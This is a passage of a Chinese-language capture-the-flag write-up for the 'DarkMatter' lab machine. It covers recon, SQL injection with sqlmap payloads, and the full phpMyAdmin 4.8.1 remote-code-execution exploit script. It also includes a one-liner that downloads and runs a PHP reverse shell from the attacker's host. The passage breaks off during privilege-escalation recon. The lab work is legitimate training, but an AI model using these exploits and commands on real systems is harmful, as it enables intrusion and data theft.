![\"image-20240712183521190\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408090859072.png\")
<\/div>\n
![\"image-20240808075827072\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408090859074.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ rustscan -a $IP -- -sCV \n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 172.20.10.6:22\nOpen 172.20.10.6:80\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 8.4p1 Debian 5 (protocol 2.0)\n| ssh-hostkey: \n| 3072 54:42:86:67:e3:5b:74:e1:87:9c:4d:80:0a:59:f3:4d (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC\/810ntjvY+YKXdq1kS0tvwqkjPh5sOOZykJ9UwHRV6IxhocPDvUEbe5NQrYyuRX619\/5n1+Rd1JTpBU4y5jkmF8ioqWColdaUnXJKeo8zGd8g\/Jmc86hQuqT4\/\/fIc\/bhttQzjAQXGdasZnYK3Ro4tomYPZ1Jer9lge01rivQJIJhyst4iXFlJN7PqkLmuDrSOaM5ul7zQ9ffT2765rLiOKe74bYivwRmT3o+ktdx9OCsKfKQ1lNYdHoF\/+2hqAEvcYhljd+kO7MYRpFZq1S8Vx+GaX4rxsFwknYrSv2BRM7eGTpukW\/6Liy1FQe699mXgpEr4\/mK8VxKpXjgtzMsBWWenFB8EwEgHzWYx6YywiCG6yRr2IQfJ8pptyt8dEe18hjRlklIc6q4QlrLJD6YFPblvmSU4Y6cQVb8fkn8Y3kI4NoPpMrDFVSPT9ruqcdq7qv0CyCJMFqJo0J+cjipsA1FoRmoRiVdRV\/Ere0lMYF0Y6OPmueDJWyzVahuruE=\n| 256 b8:ae:fd:d6:01:e8:e4:0f:63:74:7c:ea:20:ac:fe:80 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBK\/xU10I7Yc0KCO970yMzJv0Sqyhwlv+J2PL1roiJHyHxq\/DY71BX2m6PMvpiOlynikdFUBL7goPSpqhWTBAb9g=\n| 256 f6:40:de:a2:c3:ec:2f:e0:f0:b9:76:21:3e:ee:a7:5d (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINH3mv5b7iZ2z8NoJ773\/GrtGBCMgLymD0GbAXI4UWn\/\n80\/tcp open http syn-ack Apache httpd 2.4.51 ((Debian))\n|_http-title: Apache2 Debian Default Page: It works\n|_http-server-header: Apache\/2.4.51 (Debian)\n| http-methods: \n|_ Supported Methods: OPTIONS HEAD GET POST\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt -b 301,401,403,404 \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/172.20.10.6\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 301,401,403,404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,txt\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/robots.txt (Status: 200) [Size: 14]\nProgress: 39466 \/ 661683 (5.96%)[ERROR] Get "http:\/\/172.20.10.6\/index_4": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/172.20.10.6\/Install.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/172.20.10.6\/prodotti.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 206416 \/ 661683 (31.20%)[ERROR] Get "http:\/\/172.20.10.6\/navbottom_corner.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/172.20.10.6\/namevoyager.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/172.20.10.6\/navbottom_corner": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 238605 \/ 661683 (36.06%)[ERROR] Get "http:\/\/172.20.10.6\/tattoo-removal.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 248356 \/ 661683 (37.53%)^C\n[!] Keyboard interrupt detected, terminating.\nProgress: 248412 \/ 661683 (37.54%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ curl -s http:\/\/$IP | html2text\n\n[Debian Logo] Apache2 Debian Default Page\nIt works!\nThis is the default welcome page used to test the correct operation of the\nApache2 server after installation on Debian systems. If you can read this page,\nit means that the Apache HTTP server installed at this site is working\nproperly. You should replace this file (located at \/var\/www\/html\/index.html)\nbefore continuing to operate your HTTP server.\n........<\/code><\/pre>\n\u654f\u611f\u76ee\u5f55\u63a2\u7d22<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ curl -s http:\/\/$IP\/robots.txt \n\/p4ssw0rd.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ curl -s http:\/\/$IP\/p4ssw0rd.txt\nHere is the Password = th3-!llum!n@t0r\n\nDon't forget to add "darkmatter.hmv" in your local Machine<\/code><\/pre>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n
\u6dfb\u52a0dns\u89e3\u6790\uff0c\u91cd\u65b0\u626b\u63cf\u4e00\u4e0b\uff1a<\/p>\n
172.20.10.6 darkmatter.hmv<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ gobuster dir -u http:\/\/darkmatter.hmv -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html -b 301,401,403,404 \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/darkmatter.hmv\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 301,401,403,404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,txt,html\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html (Status: 200) [Size: 10701]\n\/robots.txt (Status: 200) [Size: 14]\nProgress: 109078 \/ 882244 (12.36%)[ERROR] Get "http:\/\/darkmatter.hmv\/sergey.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/darkmatter.hmv\/sergey": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 110783 \/ 882244 (12.56%)[ERROR] Get "http:\/\/darkmatter.hmv\/ITN_button.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/darkmatter.hmv\/yahoo-shopping_120x60": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/darkmatter.hmv\/4986": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/darkmatter.hmv\/4986.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/darkmatter.hmv\/4986.html": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/darkmatter.hmv\/ITN_button": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 143617 \/ 882244 (16.28%)<\/code><\/pre>\n\u61d2\u5f97\u626b\u4e86\uff0c\u7ee7\u7eed\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ curl -s http:\/\/darkmatter.hmv | html2text\n\n[Debian Logo] Apache2 Debian Default Page\nIt works!\nThis is the default welcome page used to test the correct operation of the\nApache2 server after installation on Debian systems. If you can read this page,\nit means that the Apache HTTP server installed at this site is working\nproperly. You should replace this file (located at \/var\/www\/html\/index.html)\nbefore continuing to operate your HTTP server.\nIf you are a normal user of this web site and don't know what this page is\nabout, this probably means that the site is currently unavailable due to\nmaintenance. If the problem persists, please contact the site's administrator.\nConfiguration Overview<\/code><\/pre>\n\u5c1d\u8bd5 fuzz \u4e00\u4e0bdns\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ wfuzz -u http:\/\/darkmatter.hmv -c -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-110000.txt -H "Host: FUZZ.darkmatter.hmv" --hw 933 2>\/dev\/null\n********************************************************\n* Wfuzz 3.1.0 - The Web Fuzzer *\n********************************************************\n\nTarget: http:\/\/darkmatter.hmv\/\nTotal requests: 114441\n\n=====================================================================\nID Response Lines Word Chars Payload \n=====================================================================\n000005051: 200 57 L 128 W 2481 Ch "dark"\n000009532: 400 10 L 35 W 301 Ch "#www"\n000010581: 400 10 L 35 W 301 Ch "#mail"\n000047706: 400 10 L 35 W 301 Ch "#smtp"\n000103135: 400 10 L 35 W 301 Ch "#pop3"\n\nTotal time: 209.3793\nProcessed Requests: 114441\nFiltered Requests: 114436\nRequests\/sec.: 546.5726<\/code><\/pre>\n\u5c1d\u8bd5\u6dfb\u52a0dns\u8fdb\u884c\u8fdb\u4e00\u6b65\u626b\u63cf\uff1a<\/p>\n
172.20.10.6 dark.darkmatter.hmv<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ gobuster dir -u http:\/\/dark.darkmatter.hmv -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt -b 301,401,403,404\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/dark.darkmatter.hmv\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 401,403,404,301\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,txt\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.php (Status: 200) [Size: 2481]\n\/blog.php (Status: 200) [Size: 8433]\n\/home.php (Status: 200) [Size: 4459]\n\/register.php (Status: 200) [Size: 5602]\n\/login.php (Status: 200) [Size: 4117]\n\/header.php (Status: 200) [Size: 272]\n\/profile.php (Status: 302) [Size: 3692] [--> login.php]\n\/footer.php (Status: 200) [Size: 350]\n\/update.php (Status: 302) [Size: 644] [--> login.php]\n\/status.php (Status: 302) [Size: 3225] [--> login.php]\n\/logout.php (Status: 302) [Size: 0] [--> login.php]\n\/navbar.php (Status: 200) [Size: 1766]\n\/manage.php (Status: 302) [Size: 4045] [--> login.php]\nProgress: 19853 \/ 661683 (3.00%)[ERROR] Get "http:\/\/dark.darkmatter.hmv\/stunnel.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/dark.darkmatter.hmv\/current_affairs.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/dark.darkmatter.hmv\/969.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/dark.darkmatter.hmv\/969.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/dark.darkmatter.hmv\/current_affairs": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 25750 \/ 661683 (3.89%)\n[!] Keyboard interrupt detected, terminating.\nProgress: 25777 \/ 661683 (3.90%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ whatweb http:\/\/dark.darkmatter.hmv\nhttp:\/\/dark.darkmatter.hmv [200 OK] Apache[2.4.51], Bootstrap, Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache\/2.4.51 (Debian)], IP[172.20.10.6], JQuery, Script, Title[Demooo]<\/code><\/pre>\n![\"image-20240808092403527\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u5c1d\u8bd5\u6ce8\u518c\u4e00\u4e0b\uff1a<\/p>\n
<\/div>
\n<\/div>
\n<\/div><\/p>\n\u4e5f\u4e0d\u884c\uff0c\u5e94\u8be5\u4e0d\u4f1a\u771f\u8981\u627e\u4e2a\u90ae\u7bb1\u641e\u5427\uff0c\u8bd5\u8bd5\u672c\u5730\u90ae\u7bb1\uff1f<\/p>\n
<\/div><\/p>\n\u53d1\u73b0\u6210\u529f\u4e86\uff0c\u5c1d\u8bd5\u767b\u5f55\u3002<\/p>\n
<\/div><\/p>\n\u5728blog\u627e\u5230\u4e86\u4e00\u4e9b\u7528\u6237\u540d\uff0c\u770b\u8d77\u6765\u50cf\u662f\u540d\u4eba\u540d\u8a00\uff0c\u6682\u65f6\u5148\u4e0d\u7528\uff0c\u770b\u4e00\u4e0b\u654f\u611f\u76ee\u5f55\uff1a<\/p>\n
# http:\/\/dark.darkmatter.hmv\/navbar.php\n\u6ca1\u4e1c\u897f<\/code><\/pre>\n<\/div><\/p>\nsql\u6ce8\u5165<\/h3>\n
\u5c1d\u8bd5\u770b\u4e00\u4e0b\u76f8\u5173\u4fe1\u606f\uff0c\u70b9\u4e00\u4e0bupdate\uff1a<\/p>\n
http:\/\/dark.darkmatter.hmv\/update.php?id=5<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u6ce8\u5165\uff08\u624b\u52a8\u8bd5\u4e86\u51e0\u4e0b\u6ca1\u51fa\u6765\uff09\uff0c\u8fd9\u4e2a\u5de5\u5177\u548csqlmap\u4e00\u6837\uff0c\u53ea\u662f\u56e0\u4e3a\u5dee\u751f\u6587\u5177\u591a\uff0c\u54c8\u54c8\u54c8\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ ghauri -u "http:\/\/dark.darkmatter.hmv\/update.php?id=5" --cookie "PHPSESSID=c5nvi9jb2jfjfsf1lq403snpns" --batch \n---\nParameter: id (GET)\n Type: boolean-based blind\n Title: AND boolean-based blind - WHERE or HAVING clause\n Payload: id=5' AND 02477=2477-- wXyW\n\n Type: time-based blind\n Title: MySQL >= 5.0.12 time-based blind (IF - comment)\n Payload: id=5'XOR(if(now()=sysdate(),SLEEP(8),0))XOR'Z\n---\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ sqlmap -u "http:\/\/dark.darkmatter.hmv\/update.php?id=5" --cookie "PHPSESSID=c5nvi9jb2jfjfsf1lq403snpns" --batch\n---\nParameter: id (GET)\n Type: boolean-based blind\n Title: AND boolean-based blind - WHERE or HAVING clause\n Payload: id=5' AND 5111=5111 AND 'BHBW'='BHBW\n\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: id=5' AND (SELECT 6907 FROM (SELECT(SLEEP(5)))SUJr) AND 'Wzgo'='Wzgo\n\n Type: UNION query\n Title: Generic UNION query (NULL) - 6 columns\n Payload: id=5' UNION ALL SELECT NULL,CONCAT(0x7178707071,0x485a426d6f59676875437859506c52746a736642624a6d7069504a676f466a4f4a504d4a4c684c74,0x7178767a71),NULL,NULL,NULL,NULL-- -\n---\n\n# sqlmap -u "http:\/\/dark.darkmatter.hmv\/update.php?id=5" --cookie "PHPSESSID=c5nvi9jb2jfjfsf1lq403snpns" --batch --dbs\navailable databases [4]:\n[*] information_schema\n[*] mysql\n[*] performance_schema\n[*] phpmyadmin\n\n# sqlmap -u "http:\/\/dark.darkmatter.hmv\/update.php?id=5" --cookie "PHPSESSID=c5nvi9jb2jfjfsf1lq403snpns" --batch -D phpmyadmin --tables\n+------------------------+\n| pma__bookmark |\n| pma__central_columns |\n| pma__column_info |\n| pma__designer_settings |\n| pma__export_templates |\n| pma__favorite |\n| pma__history |\n| pma__navigationhiding |\n| pma__pdf_pages |\n| pma__recent |\n| pma__relation |\n| pma__savedsearches |\n| pma__table_coords |\n| pma__table_info |\n| pma__table_uiprefs |\n| pma__tracking |\n| pma__userconfig |\n| pma__usergroups |\n| pma__users |\n+------------------------+\n\n# sqlmap -u "http:\/\/dark.darkmatter.hmv\/update.php?id=5" --cookie "PHPSESSID=c5nvi9jb2jfjfsf1lq403snpns" --batch -D phpmyadmin -T pma__userconfig --dump\n+----------+---------------------+-------------------------------+\n| username | timevalue | config_data |\n+----------+---------------------+-------------------------------+\n| pam | 2021-11-14 05:58:36 | {"Console\\\\\/Mode":"collapse"} |\n+----------+---------------------+-------------------------------+<\/code><\/pre>\n\u53d1\u73b0\u5b58\u5728 phpmyadmin\uff0c\u627e\u5230\u4e00\u4e2a\u7528\u6237\u540d\uff0c\u5c1d\u8bd5\u767b\u5f55\uff1a<\/p>\n
pam\nth3-!llum!n@t0r<\/code><\/pre>\n<\/div><\/p>\n\u770b\u4e00\u4e0b\u7248\u672c\u53f74.8.1<\/code>\uff0c\u770b\u4e00\u4e0b\u662f\u5426\u6709\u6f0f\u6d1e\uff0c\u8fd9\u4e2a\u7ec4\u4ef6\u4e5f\u662f\u91cd\u707e\u533a\u3002\u3002<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ searchsploit phpmyadmin 4.8.1\n----------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path\n----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nphpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (1) | php\/webapps\/44924.txt\nphpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (2) | php\/webapps\/44928.txt\nphpMyAdmin 4.8.1 - Remote Code Execution (RCE) | php\/webapps\/50457.py\n----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ searchsploit -m php\/webapps\/50457.py\n Exploit: phpMyAdmin 4.8.1 - Remote Code Execution (RCE)\n URL: https:\/\/www.exploit-db.com\/exploits\/50457\n Path: \/usr\/share\/exploitdb\/exploits\/php\/webapps\/50457.py\n Codes: CVE-2018-12613\n Verified: True\nFile Type: Python script, ASCII text executable\nCopied to: \/home\/kali\/temp\/DarkMatter\/50457.py\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ cat 50457.py \n# Exploit Title: phpMyAdmin 4.8.1 - Remote Code Execution (RCE)\n# Date: 17\/08\/2021\n# Exploit Author: samguy\n# Vulnerability Discovery By: ChaMd5 & Henry Huang\n# Vendor Homepage: http:\/\/www.phpmyadmin.net\n# Software Link: https:\/\/github.com\/phpmyadmin\/phpmyadmin\/archive\/RELEASE_4_8_1.tar.gz\n# Version: 4.8.1\n# Tested on: Linux - Debian Buster (PHP 7.3)\n# CVE : CVE-2018-12613\n\n#!\/usr\/bin\/env python\n\nimport re, requests, sys\n\n# check python major version\nif sys.version_info.major == 3:\n import html\nelse:\n from six.moves.html_parser import HTMLParser\n html = HTMLParser()\n\nif len(sys.argv) < 7:\n usage = """Usage: {} [ipaddr] [port] [path] [username] [password] [command]\nExample: {} 192.168.56.65 8080 \/phpmyadmin username password whoami"""\n print(usage.format(sys.argv[0],sys.argv[0]))\n exit()\n\ndef get_token(content):\n s = re.search('token"\\s*value="(.*?)"', content)\n token = html.unescape(s.group(1))\n return token\n\nipaddr = sys.argv[1]\nport = sys.argv[2]\npath = sys.argv[3]\nusername = sys.argv[4]\npassword = sys.argv[5]\ncommand = sys.argv[6]\n\nurl = "http:\/\/{}:{}{}".format(ipaddr,port,path)\n\n# 1st req: check login page and version\nurl1 = url + "\/index.php"\nr = requests.get(url1)\ncontent = r.content.decode('utf-8')\nif r.status_code != 200:\n print("Unable to find the version")\n exit()\n\ns = re.search('PMA_VERSION:"(\\d+\\.\\d+\\.\\d+)"', content)\nversion = s.group(1)\nif version != "4.8.0" and version != "4.8.1":\n print("The target is not exploitable".format(version))\n exit()\n\n# get 1st token and cookie\ncookies = r.cookies\ntoken = get_token(content)\n\n# 2nd req: login\np = {'token': token, 'pma_username': username, 'pma_password': password}\nr = requests.post(url1, cookies = cookies, data = p)\ncontent = r.content.decode('utf-8')\ns = re.search('logged_in:(\\w+),', content)\nlogged_in = s.group(1)\nif logged_in == "false":\n print("Authentication failed")\n exit()\n\n# get 2nd token and cookie\ncookies = r.cookies\ntoken = get_token(content)\n\n# 3rd req: execute query\nurl2 = url + "\/import.php"\n# payload\npayload = '''select '<?php system("{}") ?>';'''.format(command)\np = {'table':'', 'token': token, 'sql_query': payload }\nr = requests.post(url2, cookies = cookies, data = p)\nif r.status_code != 200:\n print("Query failed")\n exit()\n\n# 4th req: execute payload\nsession_id = cookies.get_dict()['phpMyAdmin']\nurl3 = url + "\/index.php?target=db_sql.php%253f\/..\/..\/..\/..\/..\/..\/..\/..\/var\/lib\/php\/sessions\/sess_{}".format(session_id)\nr = requests.get(url3, cookies = cookies)\nif r.status_code != 200:\n print("Exploit failed")\n exit()\n\n# get result\ncontent = r.content.decode('utf-8', errors="replace")\ns = re.search("select '(.*?)\\n'", content, re.DOTALL)\nif s != None:\n print(s.group(1))<\/code><\/pre>\n18\u5e74\u7684\u6d1e\uff0c\u9776\u573a\u662f21\u5e74\u7684\uff0c\u53ef\u80fd\u662f\u8fd9\u4e2a\uff0c\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ python3 50457.py 172.20.10.6 80 \/phpmyadmin pam 'th3-!llum!n@t0r' whoami\nwww-data<\/code><\/pre>\n\u53ef\u4ee5\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\uff0c\u5c1d\u8bd5\u53cd\u5f39shell\u3002<\/p>\n
# python3 50457.py 172.20.10.6 80 \/phpmyadmin pam 'th3-!llum!n@t0r' 'whoami;id'\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n\n# python3 50457.py 172.20.10.6 80 \/phpmyadmin pam 'th3-!llum!n@t0r' 'cat \/etc\/passwd' \nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:101:101:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:105:113:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\ndarkenergy:x:1000:1000:DarkEnergy,,,:\/home\/darkenergy:\/bin\/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nmysql:x:107:115:MySQL Server,,,:\/nonexistent:\/bin\/false<\/code><\/pre>\n\u5c1d\u8bd5\u53cd\u5f39shell\uff1a<\/p>\n
# kali\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n172.20.10.6 - - [07\/Aug\/2024 22:26:34] "GET \/revshell.php HTTP\/1.1" 200 -\n^C\nKeyboard interrupt received, exiting.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ head revshell.php \n\n <?php\n \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\n set_time_limit (0);\n $VERSION = "1.0";\n $ip = '172.20.10.8'; \/\/ You have changed this\n $port = 1234; \/\/ And this\n $chunk_size = 1400;<\/code><\/pre>\n# attacked\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ python3 50457.py 172.20.10.6 80 \/phpmyadmin pam 'th3-!llum!n@t0r' 'cd \/tmp;wget http:\/\/172.20.10.8:8888\/revshell.php;chmod +x revshell.php;php revshell.php'<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) www-data@DarkMatter:\/$ ls -la\ntotal 68\ndrwxr-xr-x 18 root root 4096 Nov 10 2021 .\ndrwxr-xr-x 18 root root 4096 Nov 10 2021 ..\nlrwxrwxrwx 1 root root 7 Nov 10 2021 bin -> usr\/bin\ndrwxr-xr-x 3 root root 4096 Nov 10 2021 boot\ndrwxr-xr-x 17 root root 3140 Aug 7 19:57 dev\ndrwxr-xr-x 78 root root 4096 Aug 7 19:57 etc\ndrwxr-xr-x 3 root root 4096 Nov 10 2021 home\nlrwxrwxrwx 1 root root 30 Nov 10 2021 initrd.img -> boot\/initrd.img-5.10.0-9-amd64\nlrwxrwxrwx 1 root root 30 Nov 10 2021 initrd.img.old -> boot\/initrd.img-5.10.0-9-amd64\nlrwxrwxrwx 1 root root 7 Nov 10 2021 lib -> usr\/lib\nlrwxrwxrwx 1 root root 9 Nov 10 2021 lib32 -> usr\/lib32\nlrwxrwxrwx 1 root root 9 Nov 10 2021 lib64 -> usr\/lib64\nlrwxrwxrwx 1 root root 10 Nov 10 2021 libx32 -> usr\/libx32\ndrwx------ 2 root root 16384 Nov 10 2021 lost+found\ndrwxr-xr-x 3 root root 4096 Nov 10 2021 media\ndrwxr-xr-x 2 root root 4096 Nov 10 2021 mnt\ndrwxr-xr-x 2 root root 4096 Nov 21 2021 opt\ndr-xr-xr-x 149 root root 0 Aug 7 19:56 proc\ndrwx------ 4 root root 4096 Nov 20 2021 root\ndrwxr-xr-x 19 root root 540 Aug 7 19:57 run\nlrwxrwxrwx 1 root root 8 Nov 10 2021 sbin -> usr\/sbin\ndrwxr-xr-x 2 root root 4096 Nov 13 2021 srv\ndr-xr-xr-x 13 root root 0 Aug 7 19:56 sys\ndrwxrwxrwt 2 root root 4096 Aug 7 22:26 tmp\ndrwxr-xr-x 14 root root 4096 